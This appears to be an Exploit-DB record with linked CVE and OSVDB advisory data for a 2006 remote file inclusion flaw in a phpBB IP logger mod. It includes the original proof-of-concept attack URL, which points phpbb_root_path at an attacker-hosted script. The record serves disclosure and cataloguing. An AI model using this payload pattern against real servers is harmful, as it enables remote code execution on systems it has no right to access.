phpBB Security Suite Mod 1.0.0 logger_engine.php Remote File Include

{"bulletinFamily": "exploit", "id": "EDB-ID:2480", "cvelist": ["CVE-2006-5224"], "modified": "2006-10-05T00:00:00", "lastseen": "2016-01-31T16:20:58", "edition": 1, "sourceData": " / \\\n \\ \\ ,, / /\n '-.`\\()/`.-'\n .--_'( )'_--.\n / /` /`\"\"`\\ `\\ \\ * SpiderZ Hacking Security *\n | | >< | |\n \\ \\ / /\n '.__.'\n\n\n# Author: SpiderZ\n# Security Suite IP Logger Remote File Inclusion Vulnerability\n# For: phpBB ( 2.0.x - 2.0.21 )\n# Site: www.spiderz.altervista.org\n# Site02: www.spiderz.netsons.org\n_________________________________________________________________________\n\n\n# Remote File Inclusion - Security Suite IP Logger\n\n\n\nhttp://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]\n\n\n\n-------------------------------------------------------------------------\n\n# Download: http://www.phpbb.de/viewtopic.php?t=30261\n\n# Download2: http://prdownload.berlios.de/dwingmods/logger_mod100.zip\n\n-------------------------------------------------------------------------\n\n# milw0rm.com [2006-10-05]\n", "published": "2006-10-05T00:00:00", "href": "https://www.exploit-db.com/exploits/2480/", "osvdbidlist": ["29550"], "reporter": "SpiderZ", "hash": "57e6810d58b657603313e8eea69d6839b483ff2f084344c1fc7ecd5168fd0fa6", "title": "phpBB Security Suite Mod 1.0.0 logger_engine.php Remote File Include", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "phpBB Security Suite Mod 1.0.0 (logger_engine.php) Remote File Include. CVE-2006-5224. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2480/", "enchantments": {"vulnersScore": 8.5}}

{"result": {"cve": [{"id": "CVE-2006-5224", "type": "cve", "title": "CVE-2006-5224", "description": "PHP remote file inclusion vulnerability in includes/logger_engine.php in Dimitri Seitz Security Suite IP Logger 1.0.0 in dwingmods for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "published": "2006-10-10T17:07:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5224", "cvelist": ["CVE-2006-5224"], "lastseen": "2017-07-20T10:49:35"}], "osvdb": [{"id": "OSVDB:29550", "type": "osvdb", "title": "Security Suite IP Logger for phpBB includes/logger_engine.php phpbb_root_path Variable Remote File Inclusion", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## References:\n[Secunia Advisory ID:22290](https://secuniaresearch.flexerasoftware.com/advisories/22290/)\nISS X-Force ID: 29321\nGeneric Exploit URL: http://milw0rm.com/exploits/2480\nFrSIRT Advisory: ADV-2006-3926\n[CVE-2006-5224](https://vulners.com/cve/CVE-2006-5224)\nBugtraq ID: 20370\n", "published": "2006-10-05T15:04:40", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:29550", "cvelist": ["CVE-2006-5224"], "lastseen": "2017-04-28T13:20:26"}]}}